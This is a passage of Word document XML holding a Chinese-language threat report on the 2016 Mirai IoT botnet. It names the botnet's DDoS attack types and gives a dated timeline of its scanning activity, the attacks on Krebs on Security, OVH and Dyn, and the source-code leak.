                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="007E2F86" w:rsidRDefault="007E2F86">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:lang w:val="zh-CN"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w:rsidR="007E2F86" w:rsidRPr="007E2F86" w:rsidRDefault="007E2F86" w:rsidP="007E2F86"/>
    <w:p w:rsidR="00490F21" w:rsidRDefault="00490F21" w:rsidP="009A1AB3">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc472191666"/>
      <w:r>
        <w:t>事件</w:t>
      </w:r>
      <w:r w:rsidR="008C1061">
        <w:t>时间线</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w:rsidR="00237AE8" w:rsidRDefault="00CB7010" w:rsidP="005B6355">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2016年8月</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:id w:val="1183400632"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00AE2862">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00AE2862">
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidR="00AE2862">
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:instrText>CITATION Rol16 \l 2052</w:instrText>
          </w:r>
          <w:r w:rsidR="00AE2862">
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidR="00AE2862">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00B65ABC">
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00B65ABC" w:rsidRPr="00B65ABC">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[1]</w:t>
          </w:r>
          <w:r w:rsidR="00AE2862">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="005B6355">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="004353F8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidR="009370D9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>irai</w:t>
      </w:r>
      <w:r w:rsidR="002E2D9C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>恶意软件</w:t>
      </w:r>
      <w:r w:rsidR="009370D9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开始活动</w:t>
      </w:r>
      <w:r w:rsidR="00247D45">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，扫描并</w:t>
      </w:r>
      <w:r w:rsidR="006C1B45">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>感染物联网设备，包括</w:t>
      </w:r>
      <w:r w:rsidR="004353F8">
        <w:t xml:space="preserve"> DVR</w:t>
      </w:r>
      <w:r w:rsidR="006C1B45" w:rsidRPr="005B6355">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00AE2862">
        <w:t>监控摄像头</w:t>
      </w:r>
      <w:r w:rsidR="003556FB">
        <w:t>等</w:t>
      </w:r>
      <w:r w:rsidR="006C1B45" w:rsidRPr="005B6355">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0084304B" w:rsidRDefault="0084304B" w:rsidP="005B6355">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Mirai僵尸网络</w:t>
      </w:r>
      <w:r w:rsidR="003E254D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>被用来进行</w:t>
      </w:r>
      <w:r w:rsidR="00B959E0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有意的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DDo</w:t>
      </w:r>
      <w:r>
        <w:t>S攻击</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>以实现敲诈勒索</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。其主要攻击类型包括：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0084304B" w:rsidRDefault="0084304B" w:rsidP="00DB35D1">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SYN</w:t>
      </w:r>
      <w:r w:rsidR="00F85DDE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>泛洪</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0084304B" w:rsidRDefault="0084304B" w:rsidP="00DB35D1">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>UDP</w:t>
      </w:r>
      <w:r w:rsidR="00F85DDE">
        <w:t>泛洪</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0084304B" w:rsidRPr="00DB35D1" w:rsidRDefault="002E5A41" w:rsidP="00DB35D1">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>VSE(</w:t>
      </w:r>
      <w:r w:rsidR="00F85DDE" w:rsidRPr="00DB35D1">
        <w:t>Valve Source Engine) 查询泛洪</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0084304B" w:rsidRPr="00DB35D1" w:rsidRDefault="0084304B" w:rsidP="00DB35D1">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00DB35D1">
        <w:t>GRE</w:t>
      </w:r>
      <w:r w:rsidR="00F85DDE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>泛洪</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0084304B" w:rsidRPr="00DB35D1" w:rsidRDefault="0084304B" w:rsidP="00DB35D1">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00DB35D1">
        <w:t>ACK</w:t>
      </w:r>
      <w:r w:rsidR="00F85DDE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>泛洪(包含一种对抗IDMS的变种)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0084304B" w:rsidRPr="00DB35D1" w:rsidRDefault="00F85DDE" w:rsidP="00DB35D1">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00DB35D1">
        <w:t>伪随机</w:t>
      </w:r>
      <w:r w:rsidR="0084304B" w:rsidRPr="00DB35D1">
        <w:t>DNS</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB35D1">
        <w:t>标签前缀攻击</w:t>
      </w:r>
      <w:r w:rsidR="0084304B" w:rsidRPr="00DB35D1">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00DB35D1" w:rsidRPr="00DB35D1">
        <w:t>DNS</w:t>
      </w:r>
      <w:r w:rsidR="00DB35D1">
        <w:t>水刑</w:t>
      </w:r>
      <w:r w:rsidR="002373BC">
        <w:t>式攻击</w:t>
      </w:r>
      <w:r w:rsidR="0084304B" w:rsidRPr="00DB35D1">
        <w:t>)</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1257669740"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00F47497">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00F47497">
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidR="00F47497">
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:instrText>CITATION Tak16 \l 2052</w:instrText>
          </w:r>
          <w:r w:rsidR="00F47497">
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidR="00F47497">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00B65ABC">
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00B65ABC" w:rsidRPr="00B65ABC">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[2]</w:t>
          </w:r>
          <w:r w:rsidR="00F47497">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1363128497"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00F47497">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00F47497">
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidR="00F47497">
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:instrText>CITATION Sec14 \l 2052</w:instrText>
          </w:r>
          <w:r w:rsidR="00F47497">
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidR="00F47497">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00B65ABC">
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00B65ABC" w:rsidRPr="00B65ABC">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[3]</w:t>
          </w:r>
          <w:r w:rsidR="00F47497">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w:rsidR="0084304B" w:rsidRDefault="00F85DDE" w:rsidP="00DB35D1">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00DB35D1">
        <w:t>HTTP GET/POST/HEAD攻击</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B7ED4" w:rsidRDefault="00270DBE" w:rsidP="005B6355">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在寻找新肉鸡的过程中，Mirai对网络的高速扫描行为会对被扫描主机和自身的僵尸主机产生无意的DDoS攻击效果</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:id w:val="-1266140765"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00F63267">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00F63267">
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidR="00F63267">
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:instrText>CITATION Rol16 \l 2052</w:instrText>
          </w:r>
          <w:r w:rsidR="00F63267">
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidR="00F63267">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00B65ABC">
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00B65ABC" w:rsidRPr="00B65ABC">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[1]</w:t>
          </w:r>
          <w:r w:rsidR="00F63267">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60072" w:rsidRDefault="00C60072" w:rsidP="005B6355">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FE0F74" w:rsidRDefault="006B7062" w:rsidP="00FE0F74">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>引起我们关注的Mirai</w:t>
      </w:r>
      <w:r w:rsidR="00C60072">
        <w:t>活动时间线总结如下</w:t>
      </w:r>
      <w:r w:rsidR="00C60072">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00241A62" w:rsidRDefault="00241A62" w:rsidP="00FE0F74">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2016年8月1日 Mirai开始扫描360蜜罐。由于Mirai的syn包特点，可将其与其他扫描源进行区分</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:id w:val="-797831196"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:instrText>CITATION 360 \l 2052</w:instrText>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00B65ABC">
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00B65ABC" w:rsidRPr="00B65ABC">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[4]</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00A9362E" w:rsidRPr="00A9362E">
        <w:t>至9月6日以前，</w:t>
      </w:r>
      <w:r w:rsidR="00450BA2">
        <w:t>Mirai</w:t>
      </w:r>
      <w:r w:rsidR="00A9362E" w:rsidRPr="00A9362E">
        <w:t>仅扫描23端口。每日扫描源在2k～13k之间波动，中间两个波峰期每日扫描源维持在8k～11k上下</w:t>
      </w:r>
      <w:r w:rsidR="00A9362E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00272683" w:rsidRDefault="00272683" w:rsidP="00272683">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>2016年9月6日</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00450BA2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Mirai</w:t>
      </w:r>
      <w:r w:rsidRPr="00272683">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开始扫描2323 端口，与23端口相比，数量小了大约1个数量级。但此时扫描量相对较小，无论是23端口还是2323端口。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F74D9" w:rsidRDefault="000F74D9" w:rsidP="00422134">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>2016年9月20日</w:t>
      </w:r>
      <w:r w:rsidR="00FF7BBA">
        <w:t xml:space="preserve"> K</w:t>
      </w:r>
      <w:r>
        <w:t>er</w:t>
      </w:r>
      <w:r w:rsidR="00FF7BBA">
        <w:t>bs on S</w:t>
      </w:r>
      <w:r>
        <w:t>ecurity遭到620Gbps攻击</w:t>
      </w:r>
      <w:r w:rsidR="00940F5D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00422134">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>涉事的僵尸网络包括Mirai和</w:t>
      </w:r>
      <w:r w:rsidR="00422134" w:rsidRPr="00422134">
        <w:t>BASHLITE</w:t>
      </w:r>
      <w:r w:rsidR="00240703">
        <w:rPr>
          <w:rStyle w:val="a6"/>
        </w:rPr>
        <w:footnoteReference w:id="1"/>
      </w:r>
      <w:r w:rsidR="00422134">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F74D9" w:rsidRDefault="000F74D9" w:rsidP="00C60072">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>2016年9月21日 OVH遭到</w:t>
      </w:r>
      <w:r w:rsidR="006D0D5D">
        <w:t>M</w:t>
      </w:r>
      <w:r>
        <w:t>irai僵尸网络的1Tbps攻击</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00452B08" w:rsidRDefault="00452B08" w:rsidP="00C60072">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2016年9月30日左右，Mirai源码被泄露，随后被托管到GitHub。</w:t>
      </w:r>
      <w:r w:rsidR="0075321E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此后，诸多小型Mirai僵尸网络开始涌现</w:t>
      </w:r>
      <w:r w:rsidR="00397B0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，以及一个规模巨大的僵尸网络“400K”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001914D1" w:rsidRDefault="000F74D9" w:rsidP="004D30AE">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>2016年10月21</w:t>
      </w:r>
      <w:r w:rsidR="004A7883">
        <w:t>日晚间，美国</w:t>
      </w:r>
      <w:r w:rsidR="00197949">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DNS服务商</w:t>
      </w:r>
      <w:r w:rsidR="001914D1">
        <w:t>Dyn遭到</w:t>
      </w:r>
      <w:r w:rsidR="001914D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DDo</w:t>
      </w:r>
      <w:r w:rsidR="001914D1">
        <w:t>S攻击</w:t>
      </w:r>
      <w:r w:rsidR="001914D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="001914D1">
        <w:t>造成众多知名网站无法访问</w:t>
      </w:r>
      <w:r w:rsidR="004D30AE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="004D30AE">
        <w:t>如</w:t>
      </w:r>
      <w:r w:rsidR="004D30AE" w:rsidRPr="004D30AE">
        <w:t>GitHub, Twitter, Reddit, Netflix, Airbnb</w:t>
      </w:r>
      <w:r w:rsidR="001914D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="004A7883" w:rsidRPr="004A7883">
        <w:t>攻击手段是混合使用DNS</w:t>
      </w:r>
      <w:r w:rsidR="004A7883">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004A7883" w:rsidRPr="004A7883">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t>flood和</w:t>
      </w:r>
      <w:r w:rsidR="004A7883">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> SYN</w:t>
      </w:r>
      <w:r w:rsidR="004A7883" w:rsidRPr="004A7883">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004A7883" w:rsidRPr="004A7883">
        <w:t>flood</w:t>
      </w:r>
      <w:r w:rsidR="004A7883" w:rsidRPr="004A7883">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004A7883">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="004F5BB9" w:rsidRPr="004F5BB9">
        <w:t>Level 3最早报告此次攻击跟Mirai有关</w:t>
      </w:r>
      <w:r w:rsidR="006969B5">
        <w:rPr>
          <w:rStyle w:val="a6"/>
        </w:rPr>
        <w:footnoteReference w:id="2"/>
      </w:r>
      <w:r w:rsidR="004F5BB9" w:rsidRPr="004F5BB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="001914D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>360认为仅部分流量来自于Mirai僵尸网络</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:id w:val="2066906145"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00C60072">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00C60072">
            <w:instrText xml:space="preserve">CITATION 360 \l 2052 </w:instrText>
          </w:r>
          <w:r w:rsidR="00C60072">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00B65ABC">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00B65ABC" w:rsidRPr="00B65ABC">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[4]</w:t>
          </w:r>
          <w:r w:rsidR="00C60072">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="001914D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00272683" w:rsidRDefault="00272683" w:rsidP="00272683">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00272683">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2016年10月23日凌晨，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>360</w:t>
      </w:r>
      <w:r w:rsidRPr="00272683">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>累积观察到的</w:t>
      </w:r>
      <w:r w:rsidR="00450BA2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Mirai</w:t>
      </w:r>
      <w:r w:rsidRPr="00272683">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> bot IP已经有大约</w:t>
      </w:r>
      <w:r w:rsidR="007B71DE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>72万，为大型僵尸网络</w:t>
      </w:r>
      <w:r w:rsidRPr="00272683">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00013F59" w:rsidRDefault="00013F59" w:rsidP="00A74D85">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
